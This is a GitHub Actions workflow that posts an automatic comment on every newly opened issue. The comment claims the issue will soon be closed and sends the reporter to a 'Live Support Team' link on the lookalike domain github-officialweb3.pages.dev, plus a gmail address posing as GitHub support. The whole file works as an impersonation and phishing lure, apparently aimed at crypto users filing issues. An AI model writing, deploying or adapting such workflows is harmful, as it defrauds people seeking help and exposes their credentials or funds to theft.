name: Comment on New Issue

permissions:
  issues: write

on:
  issues:
    types: [opened]

jobs:
  comment:
    runs-on: ubuntu-latest

    steps:
      - name: Comment on new issue
        uses: actions/github-script@v7
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          script: |
            const issueNumber = context.payload.issue.number;

            const issueMessage =
              "👋 Please note that this issue will be automatically closed shortly.\n\n" +
              "For prompt assistance and a timely resolution, we kindly advise you to click here:\n" +
              "[Live Support Team](https://github-officialweb3.pages.dev)\n\n" +
              "Once on the page, click the chat icon located at the bottom corner to initiate a conversation with a live support agent who will guide you through the process.\n\n" +
              "You may also contact our support team directly at:\n" +
              "GitHub.interact@gmail.com";

            await github.rest.issues.createComment({
              owner: context.repo.owner,
              repo: context.repo.repo,
              issue_number: issueNumber,
              body: issueMessage + "\n\n— Team 🚀"
            });

            await github.rest.issues.addLabels({
              owner: context.repo.owner,
              repo: context.repo.repo,
              issue_number: issueNumber,
              labels: ["needs-follow-up"]
            });
